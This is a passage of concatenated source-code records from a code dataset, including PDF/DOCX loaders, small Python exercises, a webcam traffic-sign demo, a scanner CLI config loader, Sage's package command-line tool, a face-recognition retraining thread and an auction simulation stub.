figure_data_group['data'].append(processed_text)\n\n elif not next_is_figure_data: # neither next or current text is figure\n # Not a figure, add to text\n result[TEXT_KEY].append(processed_text)\n else: # next text is figure, meaning that current text will be stored as title.\n pass\n\n # Handles case when text potentially interrupts figure.\n # Text is again stored in figure_data_group['data'].\n if previous_was_figure_data and next_is_figure_data:\n current_is_figure_data = True\n\n # only change previous text when current para is not empty or repeated string.\n previous_text = processed_text\n\n # Table\n elif current_elem.tag.endswith('tbl'):\n table_index = [tbl._element for tbl in doc.tables].index(current_elem)\n table = doc.tables[table_index]\n\n headers = [cell.text.strip() for cell in table.rows[0].cells]\n\n rows = []\n for row in table.rows[1:]:\n row_data = {headers[j]: cell.text.strip() for j, cell in enumerate(row.cells)}\n rows.append(row_data)\n\n result[TABLE_KEY].append({\n 'title': previous_text,\n 'col_headers': headers,\n TABLE_ROWS_KEY: rows\n })\n else:\n print(f\"Ignoring {current_elem.tag}.\")\n\n return result\n\n TEXT_LOADERS = {\n DOXC_KEY: doxc_text_loader,\n DOXC2PYTHON_KEY: docx2python_text_loader,\n }\n TABLE_LOADERS = {\n DOXC_KEY: doxc_table_loader,\n }\n FIGURE_LOADERS = {\n DOXC_KEY: doxc_fig_loader,\n }\n\n\nclass PDFLoader(Loader):\n\n def __init__(self, file_path, dir_path='./data/pdf_db'):\n super().__init__(file_path=file_path, dir_path=dir_path)\n\n @property\n def path(self):\n return self._path\n\n @path.setter\n def path(self, new_path):\n if not os.path.exists(new_path):\n raise FileNotFoundError(f\"The file {new_path} does not exist.\")\n\n if not new_path.lower().endswith('.pdf'):\n raise ValueError(\"The file must be a PDF.\")\n\n if not os.path.isfile(new_path):\n raise ValueError(\"The path must point to a file, not a directory.\")\n\n self._path = new_path\n\n @staticmethod\n def pypdf2_text_loader(file_path: str) -> List[str]:\n \"\"\"\n Extract text from a PDF file using PyPDF2.\n\n :param file_path: The path to the PDF file.\n :return: A list of strings, where each string represents the text content of a page.\n \"\"\"\n with open(file_path, 'rb') as f:\n reader = PyPDF2.PdfFileReader(f)\n text_content = []\n for page_num in range(reader.getNumPages()):\n page = reader.getPage(page_num)\n text_content.append(page.extract_text())\n return text_content\n\n # @staticmethod\n # def pdfminer_text_loader(file_path: str) -> List[str]:\n # \"\"\"\n # Extract text from a PDF file using pdfminer.\n #\n # :param file_path: The path to the PDF file.\n # :return: A list of strings, where each string represents a line of text.\n # \"\"\"\n # text_content = extract_text(file_path)\n # return text_content.split('\\n') # Splitting by newline to get a list of lines\n\n @staticmethod\n def slate_text_loader(file_path) -> List[str]:\n \"\"\"\n Extract text from a PDF file using slate.\n\n :param file_path: The path to the PDF file.\n :return: A list of strings, where each string represents the text content of a page.\n \"\"\"\n with open(file_path, 'rb') as f:\n doc = slate.PDF(f)\n text_content = [page for page in doc]\n # You would need additional logic here to separate tables from text\n return text_content\n\n @staticmethod\n def regex_table_loader(file_path) -> List[str]:\n \"\"\"\n Extract tables from a PDF file using regular expressions.\n\n :param file_path: The path to the PDF file.\n :return: A list of strings, where each string represents a 
detected table row.\n \"\"\"\n with open(file_path, 'r', encoding='utf-8') as f:\n text_content = f.read()\n\n # This is a very simplistic example and may need to be adjusted\n # to suit the actual format of your tables.\n tables = re.findall(r'(\\d+ \\d+ \\d+)', text_content)\n return tables\n\n # @staticmethod\n # def pdfplumber_text_loader(file_path) -> List[str]:\n # \"\"\"\n # Extract text from a PDF file using pdfplumber.\n #\n # :param file_path: The path to the PDF file.\n # :return: A list of strings, where each string represents the text content of a page.\n # \"\"\"\n # with pdfplumber.open(file_path) as pdf:\n # text_content = [page.extract_text() for page in pdf.pages]\n # return text_content\n\n # @staticmethod\n # def pdfplumber_table_loader(file_path) -> List[str]:\n # \"\"\"\n # Extract tables from a PDF file using pdfplumber.\n #\n # :param file_path: The path to the PDF file.\n # :return: A list of tables, where each table is represented as a list of rows,\n # and each row is a list of strings.\n # \"\"\"\n # with pdfplumber.open(file_path) as pdf:\n # tables = []\n # for page in pdf.pages:\n # page_tables = page.extract_tables()\n # tables.extend(page_tables)\n #\n # # Convert the tables to list of strings\n # result = []\n # for table in tables:\n # for row in table:\n # result.append(' '.join(row))\n # return result\n\n @staticmethod\n def pypdf2_table_loader(file_path) -> List[str]:\n \"\"\"\n Extract text and tables from a PDF file using an enhanced version of PyPDF2.\n\n :param file_path: The path to the PDF file.\n :return: A list of pages, where each page is represented as a list of strings.\n Strings represent either lines of text or detected table rows.\n \"\"\"\n def enhanced_text_analysis(text):\n # Implement custom logic to analyze and extract tables or structured data\n # This could involve regular expressions, heuristics, or machine learning models\n\n # For example, a simple heuristic might be to look for lines of text that are\n # formatted like table rows, perhaps with data separated by spaces or other delimiters\n lines = text.split('\\n')\n tables = []\n current_table = []\n for line in lines:\n if is_table_row(line): # You need to define is_table_row function\n current_table.append(line)\n elif current_table:\n tables.append(current_table)\n current_table = []\n if current_table:\n tables.append(current_table)\n\n return tables\n\n def is_table_row(line):\n # Define your own logic to determine if a line of text represents a table row\n # This is a simplistic example and might need to be significantly expanded\n # depending on your PDFs' content and structure\n if len(line.split()) > 1: # If the line has multiple words or numbers, consider it a table row\n return True\n return False\n\n with open(file_path, 'rb') as f:\n reader = PyPDF2.PdfFileReader(f)\n text_content = []\n for page_num in range(reader.getNumPages()):\n page = reader.getPage(page_num)\n text_content.append(enhanced_text_analysis(page.extract_text()))\n\n # Convert the tables to list of strings\n result = []\n for page_content in text_content:\n for item in page_content:\n if isinstance(item, list): # If the item is a table (list of lists)\n for row in item:\n result.append(' '.join(row))\n else:\n result.append(item)\n return result\n\n # @staticmethod\n # def camelot_table_loader(file_path: str) -> List[str]:\n # \"\"\"\n # Extract tables from a PDF file using Camelot.\n #\n # :param file_path: The path to the PDF file.\n # :return: A list of strings, where each string represents a 
table row.\n # \"\"\"\n # tables = camelot.read_pdf(file_path, pages='all', flavor='stream')\n # result = []\n # for table in tables:\n # df = table.df\n # for index, row in df.iterrows():\n # result.append(' '.join(row))\n # return result\n\n @staticmethod\n def tabula_table_loader(file_path: str) -> List[str]:\n \"\"\"\n Extract tables from a PDF file using Tabula.\n\n :param file_path: The path to the PDF file.\n :return: A list of strings, where each string represents a table row.\n \"\"\"\n dfs = tabula.read_pdf(file_path, pages='all', multiple_tables=True)\n result = []\n for df in dfs:\n for index, row in df.iterrows():\n result.append(' '.join(row.astype(str)))\n return result\n\n @staticmethod\n def ocr_loader(file_path) -> List[str]:\n # TODO: Implement OCR solution using (for instance) pytesseract and cv2\n raise NotImplementedError\n\n TEXT_LOADERS = {\n PYPDF2_KEY: pypdf2_text_loader,\n SLATE_KEY: slate_text_loader,\n # PLUMBER_KEY: pdfplumber_text_loader,\n # MINER_KEY: pdfminer_text_loader,\n }\n\n # TODO: Consider LayoutLM (by Microsoft)\n TABLE_LOADERS = {\n # CAMELOT_KEY: camelot_table_loader,\n TABULA_KEY: tabula_table_loader,\n PYPDF2_KEY: pypdf2_table_loader,\n # PLUMBER_KEY: pdfplumber_table_loader,\n REGEX_KEY: regex_table_loader,\n OCR_KEY: ocr_loader,\n }\n","repo_name":"krystofmincevey/eyalytics","sub_path":"src/utils/loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":22652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
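The `Loader` hierarchy above routes `load_text`/`load_tables`/`load_figure` through class-level dispatch tables that map string keys to loader callables. A minimal sketch of that registry pattern (all names are illustrative):

```python
from typing import Callable, Dict, List

class TinyLoader:
    # key -> loader callable; subclasses override or extend this table
    TEXT_LOADERS: Dict[str, Callable[[str], List[str]]] = {}

    def __init__(self, path: str):
        self.path = path

    def load_text(self, key: str) -> List[str]:
        if key not in self.TEXT_LOADERS:
            raise KeyError(f"Supported loaders: {list(self.TEXT_LOADERS)}, not {key!r}")
        return self.TEXT_LOADERS[key](self.path)

def line_loader(path: str) -> List[str]:
    with open(path) as f:
        return [line.rstrip("\n") for line in f]

TinyLoader.TEXT_LOADERS["lines"] = line_loader
```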
+{"seq_id":"13831812331","text":"# happy number\r\n\r\ndef num2list(num):\r\n return [x for x in str(num)]\r\n \r\ndef is_happy_helper(n): # returns the sum of all digits to the second power\r\n lst = num2list(n)\r\n num = 0\r\n for val in lst:\r\n num += (int(val) ** 2)\r\n return num\r\n \r\n\r\ndef is_happy(n: int) -> bool:\r\n count = 0\r\n while n != 1 and count <= 990: # 990 recursion limit\r\n count += 1\r\n n = is_happy_helper(n)\r\n if count >= 989: # checks if recursion limit is hit\r\n return False\r\n return True\r\n\r\n \r\n\r\nprint(is_happy(19)) # true\r\nprint(is_happy(2)) # false \r\n\r\n\r\n# longest common prefix\r\ndef longest_common_prefix(strs: [str]) -> str:\r\n if len(strs) == 1:\r\n return strs[0]\r\n longest = \"\"\r\n strs.sort(key = len)\r\n for index, char in enumerate(strs[0]):\r\n # toAdd = True\r\n for word in strs[1:]:\r\n if word[index] != char:\r\n # toAdd = False\r\n # break\r\n return longest # we return longest here because it's a prefix. we don't care about the rest. \r\n # if we did care about the rest we would add the comments instead\r\n longest += char\r\n # if toAdd:\r\n # longest += char\r\n return longest\r\n\r\nprint(longest_common_prefix([\"flow\", \"flower\", \"floor\"]))\r\n\r\n\r\n\r\n","repo_name":"Arellano-Jann/techwise","sub_path":"assignment275/275.py","file_name":"275.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"31403694033","text":"\"\"\"\nMain program to run the detection\n\"\"\"\n\nfrom argparse import ArgumentParser\nimport cv2\nimport numpy as np\nfrom model import MyModel\n\nmy_model = MyModel(n_layer=6, path=\"augment_x64_0_best.ckpt\")\n\ndef main():\n\n cap = cv2.VideoCapture(0)\n\n while cap.isOpened():\n success, img = cap.read()\n\n if not success:\n print(\"Ignoring empty camera frame.\")\n continue\n\n pred = my_model.pred(img)\n\n # 使用各種字體\n cv2.putText(img, pred, (10, 40), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 255), 1, cv2.LINE_AA)\n\n cv2.imshow('camera', img)\n \n # press \"q\" to leave\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n cap.release()\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"YuTing-Fang1999/Traffic-Sign","sub_path":"start.py","file_name":"start.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"23335972379","text":"#coding:utf-8\n\n#chain = \"abcdefghijklmnopqrstuvwxyz\"\n#for eachChar in chain:\n# print(eachChar)\n\nindex = -1\ndef getCommand(msg, cmd):\n global index\n chain = str(cmd)+\" \"\n index = msg.find(chain, 1, len(chain) + 1)\n if index != -1:\n return 1\n return 0\n\nmsg = str(input(\"=> \"))\n\nprint(getCommand(msg, \"echo\"))\n","repo_name":"matdubuisson/informatic","sub_path":"Python/EXAMPLE/char.py","file_name":"char.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"28599909681","text":"import sys\nfrom argparse import Namespace\nfrom configparser import ConfigParser\nfrom types import SimpleNamespace\nfrom typing import Any, Type, List, Dict, Optional\n\nfrom .cli_parser import CliCanonicalValueExtractor, get_cli_values, parser\nfrom .config_items import ConfigItemDefinition, \\\n AlwaysInvalidExtractor, CanonicalValueExtractorInterface, not_set_token, \\\n get_config_map_for_subcommand\nfrom .ini_parser import load_ini, get_ini_value_extractor\n\n\nclass Config(SimpleNamespace):\n\n def __init__(\n self,\n definitions,\n subcommand,\n ini_path: Optional[str] = None\n ):\n super().__init__()\n self.__definitions = definitions\n self.subcommand = subcommand\n self.ini_path = ini_path\n self.trailing_arguments = None\n\n def values(self) -> Dict[str, Any]:\n result: Dict[str, Any] = dict()\n for prop, value in vars(self).items():\n if (prop.startswith('_') or callable(value) or\n isinstance(value, classmethod)):\n continue\n result[prop] = value\n return result\n\n def get(self, property_name) -> Any:\n return getattr(self, property_name)\n\n def define(self, property_name) -> ConfigItemDefinition:\n return self.__definitions[property_name]\n\n def has_ini_file(self) -> bool:\n return self.ini_path is not None\n\n\n__instance: Optional[Config] = None\n__ini_path: Optional[str] = None\n__ini_values: Optional[ConfigParser] = None\n__cli_values: Optional[Namespace] = None\n\nvalue_extractors: List = []\n\n\ndef create_config_object(definitions: Dict[str, ConfigItemDefinition],\n trailing_arguments: List[str], *ordered_sources):\n if len(ordered_sources) < 1:\n raise ValueError(\"At least one configuration source must be passed in\")\n target = Config(definitions, __cli_values.subcommand)\n for source in ordered_sources:\n # if an appropriate extractor isn't found, an exception will be thrown\n extractor_class: Type[\n CanonicalValueExtractorInterface] = AlwaysInvalidExtractor\n for extractor in value_extractors:\n if extractor.is_valid_source(source):\n extractor_class = extractor\n break\n # extract all values from the source and\n # conditionally update the config\n for item_definition in definitions.values():\n new_value = (extractor_class\n .get_canonical_value(item_definition, source))\n\n # later values always replace previous values\n if new_value is not not_set_token:\n setattr(target, item_definition.property_name, new_value)\n elif not hasattr(target, item_definition.property_name):\n default = item_definition.default\n if item_definition.has_separator() and \\\n isinstance(default, str):\n default = default.split(item_definition.meta.separator)\n setattr(target, item_definition.property_name,\n default)\n target.trailing_arguments = trailing_arguments\n return target\n\n\ndef load_config():\n global __instance\n global __ini_values\n global __cli_values\n if not __instance:\n __cli_values, trailing_arguments = get_cli_values()\n if not __cli_values.subcommand:\n parser.print_help()\n sys.exit()\n __ini_values, __ini_path = load_ini(__cli_values)\n\n value_extractors.append(get_ini_value_extractor(__cli_values))\n value_extractors.append(CliCanonicalValueExtractor())\n\n __instance = create_config_object(\n get_config_map_for_subcommand(__cli_values.subcommand),\n trailing_arguments,\n __ini_values,\n __cli_values)\n __instance.ini_path = __ini_path\n return 
__instance\n","repo_name":"wpelucas/malware-scanner","sub_path":"wordfence/cli/config/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
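The precedence rule in `create_config_object()` above — later sources replace earlier values, and a default applies only when no source set the key — reduces to a small merge loop; an illustrative sketch (names below are not from the module):

```python
from typing import Any, Dict

NOT_SET = object()  # sentinel, in the spirit of the module's not_set_token

def merge(defaults: Dict[str, Any], *sources: Dict[str, Any]) -> Dict[str, Any]:
    result = dict(defaults)
    for source in sources:               # ordered: earliest first
        for key, value in source.items():
            if value is not NOT_SET:     # later values always replace previous ones
                result[key] = value
    return result

ini = {"workers": 4}
cli = {"workers": NOT_SET, "verbose": True}
assert merge({"workers": 1, "verbose": False}, ini, cli) == {"workers": 4, "verbose": True}
```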
+{"seq_id":"6778825928","text":"import os\nimport sys\nimport logging\nlog = logging.getLogger()\n\n\n# Note that argparse is not part of Python 2.6, so we bundle it\ntry:\n import argparse\nexcept ImportError:\n from sage_bootstrap.compat import argparse\n\nfrom sage_bootstrap.app import Application\n\n\ndescription = \\\n\"\"\"\nSage Bootstrap Library\n\"\"\"\n\n\nepilog = \\\n\"\"\"\nThe individual subcommands have their own detailed help, for example\nrun \"sage --package config -h\" to see the help on the config option.\n\"\"\"\n\n\nepilog_config = \\\n\"\"\"\nPrint the configuration\n\nEXAMPLE:\n\n $ sage --package config\n Configuration:\n * log = info\n * interactive = True\n\"\"\"\n\n\nepilog_list = \\\n\"\"\"\nPrint a list of all available packages\n\nEXAMPLE:\n\n $ sage --package list | sort\n 4ti2\n arb\n atlas\n autotools\n [...]\n zn_poly\n\"\"\"\n\n\nepilog_name = \\\n\"\"\"\nFind the package name given a tarball filename\n \nEXAMPLE:\n\n $ sage --package name pari-2.8-1564-gdeac36e.tar.gz\n pari\n\"\"\"\n\n\nepilog_tarball = \\\n\"\"\"\nFind the tarball filename given a package name\n \nEXAMPLE:\n\n $ sage --package tarball pari\n pari-2.8-1564-gdeac36e.tar.gz\n\"\"\"\n\n\nepilog_apropos = \\\n\"\"\"\nFind up to 5 package names that are close to the given name\n\nEXAMPLE:\n\n $ sage --package apropos python\n Did you mean: cython, ipython, python2, python3, patch?\n\"\"\"\n \n\nepilog_update = \\\n\"\"\"\nUpdate a package. This modifies the Sage sources. \n \nEXAMPLE:\n\n $ sage --package update pari 2015 --url=http://localhost/pari/tarball.tgz\n\"\"\"\n\n\nepilog_download = \\\n\"\"\"\nDownload the tarball for a package and print the filename to stdout\n \nEXAMPLE:\n\n $ sage --package download pari\n Using cached file /home/vbraun/Code/sage.git/upstream/pari-2.8-2044-g89b0f1e.tar.gz\n /home/vbraun/Code/sage.git/upstream/pari-2.8-2044-g89b0f1e.tar.gz\n\"\"\"\n\n\nepilog_fix_checksum = \\\n\"\"\"\nFix the checksum of a package\n \nEXAMPLE:\n\n $ sage --package fix-checksum pari\n Updating checksum of pari-2.8-2044-g89b0f1e.tar.gz\n\"\"\"\n\nepilog_create = \\\n\"\"\"\nCreate new package, or overwrite existing package\n \nEXAMPLE:\n\n $ sage --package create foo --version=3.14 --tarball=Foo-VERSION.tar.bz2 --type=standard\n Creating new package \"foo\"\n\"\"\"\n\n\ndef make_parser():\n \"\"\"\n The main commandline argument parser\n \"\"\"\n parser = argparse.ArgumentParser(\n description=description, epilog=epilog,\n prog='sage --package',\n formatter_class=argparse.RawDescriptionHelpFormatter,\n )\n parser.add_argument('--log', dest='log', default=None,\n help='one of [DEBUG, INFO, ERROR, WARNING, CRITICAL]')\n subparsers = parser.add_subparsers(dest='subcommand')\n\n parser_config = subparsers.add_parser(\n 'config', epilog=epilog_config,\n formatter_class=argparse.RawDescriptionHelpFormatter,\n help='Print the configuration')\n\n parser_list = subparsers.add_parser(\n 'list', epilog=epilog_list,\n formatter_class=argparse.RawDescriptionHelpFormatter,\n help='Print a list of all available packages')\n\n parser_name = subparsers.add_parser(\n 'name', epilog=epilog_name,\n formatter_class=argparse.RawDescriptionHelpFormatter,\n help='Find the package name given a tarball filename')\n parser_name.add_argument('tarball_filename', type=str, help='Tarball filename')\n\n parser_tarball = subparsers.add_parser(\n 'tarball', epilog=epilog_tarball,\n formatter_class=argparse.RawDescriptionHelpFormatter,\n help='Find the tarball filename given a package name')\n 
parser_tarball.add_argument('package_name', type=str, help='Package name')\n \n parser_apropos = subparsers.add_parser(\n 'apropos', epilog=epilog_apropos,\n formatter_class=argparse.RawDescriptionHelpFormatter,\n help='Find up to 5 package names that are close to the given name')\n parser_apropos.add_argument(\n 'incorrect_name', type=str, \n help='Fuzzy name to search for')\n\n parser_update = subparsers.add_parser(\n 'update', epilog=epilog_update,\n formatter_class=argparse.RawDescriptionHelpFormatter,\n help='Update a package. This modifies the Sage sources.')\n parser_update.add_argument(\n 'package_name', type=str, help='Package name')\n parser_update.add_argument(\n 'new_version', type=str, help='New version')\n parser_update.add_argument(\n '--url', type=str, default=None, help='Download URL')\n\n parser_download = subparsers.add_parser(\n 'download', epilog=epilog_download,\n formatter_class=argparse.RawDescriptionHelpFormatter,\n help='Download tarball')\n parser_download.add_argument(\n 'package_name', type=str, help='Package name')\n \n parser_fix_checksum = subparsers.add_parser(\n 'fix-checksum', epilog=epilog_fix_checksum,\n formatter_class=argparse.RawDescriptionHelpFormatter,\n help='Fix the checksum of package.')\n parser_fix_checksum.add_argument(\n 'package_name', nargs='?', default=None, type=str,\n help='Package name. Default: fix all packages.')\n \n parser_create = subparsers.add_parser(\n 'create', epilog=epilog_create,\n formatter_class=argparse.RawDescriptionHelpFormatter,\n help='Create or overwrite package.')\n parser_create.add_argument(\n 'package_name', nargs='?', default=None, type=str,\n help='Package name. Default: fix all packages.')\n parser_create.add_argument(\n '--version', type=str, default=None, help='Package version')\n parser_create.add_argument(\n '--tarball', type=str, default=None, help='Tarball filename pattern, e.g. Foo-VERSION.tar.bz2')\n parser_create.add_argument(\n '--type', type=str, default=None, help='Package type')\n\n return parser\n\n\n\ndef run():\n parser = make_parser()\n if len(sys.argv) == 1:\n parser.print_help()\n return\n args = parser.parse_args(sys.argv[1:])\n if args.log is not None:\n level = getattr(logging, args.log.upper())\n log.setLevel(level=level)\n log.debug('Commandline arguments: %s', args)\n app = Application()\n if args.subcommand == 'config':\n app.config()\n elif args.subcommand == 'list':\n app.list()\n elif args.subcommand == 'name':\n app.name(args.tarball_filename)\n elif args.subcommand == 'tarball':\n app.tarball(args.package_name)\n elif args.subcommand == 'apropos':\n app.apropos(args.incorrect_name)\n elif args.subcommand == 'update':\n app.update(args.package_name, args.new_version, url=args.url)\n elif args.subcommand == 'download':\n app.download(args.package_name)\n elif args.subcommand == 'create':\n app.create(args.package_name, args.version, args.tarball, args.type)\n elif args.subcommand == 'fix-checksum':\n if args.package_name is None:\n app.fix_all_checksums()\n else:\n app.fix_checksum(args.package_name)\n else:\n raise RuntimeError('unknown subcommand: {0}'.format(args))\n\n \nif __name__ == '__main__':\n run()\n","repo_name":"BrentBaccala/sage","sub_path":"build/sage_bootstrap/cmdline.py","file_name":"cmdline.py","file_ext":"py","file_size_in_byte":7044,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"69"}
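The subcommand wiring above boils down to one subparser per command plus a dispatch on `args.subcommand`; a condensed sketch (argument values are illustrative):

```python
import argparse

parser = argparse.ArgumentParser(prog="pkg")
subparsers = parser.add_subparsers(dest="subcommand")
subparsers.add_parser("list", help="print all packages")
parser_name = subparsers.add_parser("name", help="package name for a tarball")
parser_name.add_argument("tarball_filename")

args = parser.parse_args(["name", "pari-2.8.tar.gz"])
if args.subcommand == "name":
    # crude stand-in for app.name(); the real lookup lives in sage_bootstrap
    print(args.tarball_filename.split("-")[0])  # -> pari
```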
+{"seq_id":"39839324175","text":"\"\"\"\n\nThis class watches for updated encodings .pickle file from from retraining\nprocess and loads the new encodings.\n\n\"\"\"\nimport os\nimport sys\nimport time\nimport threading\nimport pickle\nimport numpy\nimport logging\n\nimport multiprocessing as mp\nfrom imutils import paths as imutils_paths\nfrom functools import partial\n\nfrom ai_service.retrain_model import train_image\nfrom ai_service import paths\n\n# number of retrain processes to launch\nNUM_PROCS = 2\n\nlogger = logging.getLogger(__name__)\n\n\ndef default_encodings_data():\n return {'encodings': [], 'names': [], 'image_paths': []}\n\n\nclass Trainer:\n thread = None # background thread that reads faces detected\n times_read = 0\n started_at = 0\n # default initial encodings data in case a client calls\n # get_encodings_data() before the pickle finishes loading\n # on startup\n encodings_data = default_encodings_data()\n # used to prompt the trainer thread to run _retrain_model()\n retrain_needed_event = threading.Event()\n\n # used by stats()\n # time it took to run retrain_model.py in seconds\n last_retrain_duration = 0\n # time it took to load the encodings from the pickle\n last_load_duration = 0\n # number of images last retrain\n last_num_retrained = 0\n\n # multiprocessing worker pool and queue allocated at thread start\n pool = None\n result_queue = None\n\n def __init__(self):\n if Trainer.thread is None:\n Trainer.thread = threading.Thread(target=self._thread)\n Trainer.thread.start()\n\n # Returns the last encoding data without waiting for any\n # retraining in progress\n\n def get_encodings_data(self):\n return Trainer.encodings_data\n\n # After new data/faces/face-n dirs are added, this method\n # is called. When the event is set, the trainer thread\n # is either sleeping waiting on the event or currently\n # retraining.\n #\n # It doesn't matter how far ahead or how many times this\n # is called while the trainer is training. 
When retraining\n # completes the trainer thread will immediately return from\n # event.wait and retrain again.\n #\n # There is a possibility that the trainer will get a partial\n # set of frames for a face since the Engagement thread is\n # possibly copying files to a face dir, but that should just make\n # for one or two weak / lower confidence face encodings which\n # will self correct on the next iteration of retrain_model()\n def trigger_retrain(self):\n Trainer.retrain_needed_event.set()\n\n def trigger_retrain_all(self):\n Trainer.encodings_data = default_encodings_data()\n self.trigger_retrain()\n\n @classmethod\n def stats(cls):\n fps = 0\n if cls.last_retrain_duration > 0:\n fps = cls.last_num_retrained / cls.last_retrain_duration\n\n return {\n \"lastLoad\": {\n \"duration\": cls.last_load_duration,\n },\n \"lastRetrain\": {\n \"duration\": cls.last_retrain_duration,\n \"count\": cls.last_num_retrained,\n \"fps\": fps\n },\n \"totals\": {\n \"encodings\": len(cls.encodings_data['encodings']),\n \"uniqueFaces\": len(numpy.unique(numpy.array(cls.encodings_data['names']))),\n \"uniqueFiles\": len(numpy.unique(numpy.array(cls.encodings_data['image_paths']))),\n }\n }\n\n @classmethod\n def _thread(cls):\n logger.info('Starting trainer thread.')\n cls.started_at = time.time()\n\n # In case a retrain request comes in while loading...\n cls.retrain_needed_event.clear()\n cls._load_encodings_from_file()\n\n cls.pool = mp.Pool(processes=NUM_PROCS)\n cls.result_queue = mp.Manager().Queue()\n\n while True:\n cls.retrain_needed_event.wait()\n cls.retrain_needed_event.clear()\n cls._retrain_model()\n time.sleep(0)\n\n @classmethod\n def _load_encodings_from_file(cls):\n if os.path.exists(paths.ENCODINGS_FILE_PATH):\n time_started = time.time()\n cls.last_modified = os.path.getmtime(paths.ENCODINGS_FILE_PATH)\n new_encodings_data = pickle.loads(\n open(paths.ENCODINGS_FILE_PATH, \"rb\").read(), encoding='latin1')\n\n cls.times_read += 1\n cls.encodings_data = new_encodings_data\n cls.last_load_duration = time.time() - time_started\n\n logger.info(\n f\"Trainer updated from {paths.ENCODINGS_FILE_PATH} in {cls.last_load_duration}s\")\n logger.info(\n f\"loaded {len(cls.encodings_data['encodings'])} encodings, {len(cls.encodings_data['names'])} names, and {len(cls.encodings_data['image_paths'])} image paths\")\n\n @classmethod\n def _save_encodings_to_file(cls):\n logger.info(\n f\"saving {len(cls.encodings_data['encodings'])} encodings, {len(cls.encodings_data['names'])} names, and {len(cls.encodings_data['image_paths'])} image paths\")\n with open(paths.ENCODINGS_FILE_PATH, 'wb') as fp:\n pickle.dump(cls.encodings_data, fp,\n protocol=pickle.HIGHEST_PROTOCOL)\n\n @classmethod\n def _find_untrained_file_paths(cls):\n image_paths = list(imutils_paths.list_images(paths.FACES_DATA_DIR))\n processed_paths = cls.encodings_data['image_paths']\n untrained_paths = [\n value for value in image_paths if value not in processed_paths]\n untrained_paths.sort()\n return untrained_paths\n\n @classmethod\n def _handle_retrain_result(cls, result):\n if not result:\n return\n\n logger.info(\n f\"got result from queue with {len(result['encodings'])} encodings for {result['name']} at {result['image_path']}\")\n\n if len(result['encodings']) == 0:\n cls.encodings_data['image_paths'].append(result['image_path'])\n else:\n for encoding in result['encodings']:\n cls.encodings_data['encodings'].append(encoding)\n cls.encodings_data['names'].append(result['name'])\n cls.encodings_data['image_paths'].append(\n 
result['image_path'])\n\n @classmethod\n def _retrain_model(cls):\n time_started = time.time()\n # calling the retrain_model function directly from\n # this thread and process caused a seg fault.\n # I suspect that calling face_locations() and\n # face_encodings() from face_recognition package\n # are not thread safe.\n #\n # See comment on this commit:\n # https://github.com/littlebee/shelly-bot/commit/1d18f1d26bdc0912bafb0fb7a3e480f88026a29d\n # dir_path = os.path.dirname(os.path.realpath(__file__))\n # os.system(f\"python3 {dir_path}/retrain_model.py\")\n\n untrained_file_paths = cls._find_untrained_file_paths()\n num_untrained = len(untrained_file_paths)\n logger.info(f\"found {num_untrained} untrained paths\")\n # prod_x has only one argument x (y is fixed to 10)\n train_image_partial = partial(train_image, queue=cls.result_queue)\n async_map = cls.pool.map_async(\n train_image_partial, untrained_file_paths)\n\n while not async_map.ready():\n result = None\n try:\n result = cls.result_queue.get(True, .25)\n except:\n pass\n cls._handle_retrain_result(result)\n\n while not cls.result_queue.empty():\n cls._handle_retrain_result(cls.result_queue.get())\n\n cls.last_retrain_duration = time.time() - time_started\n cls.last_num_retrained = num_untrained\n last_retrain_fps = num_untrained / cls.last_retrain_duration\n logger.info(\n f\"retraining complete. duration={cls.last_retrain_duration} fps={last_retrain_fps} \")\n\n cls._save_encodings_to_file()\n","repo_name":"littlebee/shelly-bot","sub_path":"src/ai_service/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":7892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
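The Trainer above combines a `threading.Event`-gated background thread with a `multiprocessing.Pool` for the heavy work. A stripped-down sketch of that control flow, with a toy `square` job standing in for `train_image` (names are illustrative):

```python
import multiprocessing as mp
import threading
import time

def square(x: int) -> int:  # stand-in for the real train_image() worker
    return x * x

def worker(event: threading.Event, jobs: list, results: list) -> None:
    with mp.Pool(processes=2) as pool:
        while True:
            event.wait()       # sleep until a trigger_retrain()-style wakeup
            event.clear()
            if not jobs:
                break          # an empty trigger shuts the worker down in this sketch
            batch, jobs[:] = list(jobs), []
            results.extend(pool.map(square, batch))

if __name__ == "__main__":
    trigger, jobs, results = threading.Event(), [1, 2, 3], []
    t = threading.Thread(target=worker, args=(trigger, jobs, results))
    t.start()
    trigger.set()              # analogous to trigger_retrain()
    while not results:         # crude wait for the batch to complete
        time.sleep(0.01)
    trigger.set()              # jobs is now empty, so the worker exits
    t.join()
    print(results)             # [1, 4, 9]
```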
+{"seq_id":"2902051851","text":"from .entity import Entity\nfrom enums import EntityTypes, ContainerState, ShipmentState\nfrom tools import surplus_maximisation, best_match\nfrom collections import namedtuple\nfrom tabulate import tabulate\n\nclass Auctioneer(Entity):\n \"\"\"\n All following functions are allocated to the class 'auctioneer'\n The parameters 'environment' and 'region_id' are assigned to the class\n Variables are assigned to all mentioned parameters\n\n \"\"\"\n def __init__(self, env, region):\n super().__init__()\n self.env = env\n self.region = region\n\n self.type = EntityTypes.AUCTIONEER\n\n self.entities = {}#create an empty dictionary\n\n self.auctionable_shipments = [] #create an empty list to which we can add all available shipments for auction\n self.container_bids = [] #create an empty list to which we can add all container bids\n\n self.account_value = 1000\n\n def auction(self):\n \"\"\"\n Auctions with the buyers and sellers provided to this Auctioneer.\n \"\"\"\n raise NotImplementedError(\"TODO\")\n\n def register(self, entity: Entity) -> int:\n \"\"\"\n Registers an agent with this Auctioneer.\n \"\"\"\n if entity.type 